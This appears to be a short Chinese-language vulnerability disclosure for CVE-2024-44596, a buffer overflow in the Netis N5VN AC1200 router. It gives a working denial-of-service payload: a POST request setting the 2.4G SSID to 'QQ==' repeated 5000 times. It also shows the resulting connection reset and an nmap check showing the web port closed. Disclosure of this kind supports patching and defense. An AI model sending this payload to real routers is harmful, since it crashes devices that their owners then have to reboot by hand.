日期:05/03/2024
漏洞作者:Van Lam Nguyen
Facebook:fb.com/vanlam1412
厂商主页:Netis Systems
版本:Netis N5VN AC1200 V1.0.1.1742
测试环境:Windows
CVE:CVE-2024-44596
Netis N5VN AC1200 路由器存在缓冲区溢出漏洞,攻击者可通过发送精心构造的请求,使路由器上运行的 Web 服务器崩溃。
要恢复 http(Web 服务器),用户必须手动重启路由器。
发送 POST 请求以更改 2.4G 无线网络的 ssid ('ssid': 'QQ==' * 5000)
成功:('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http

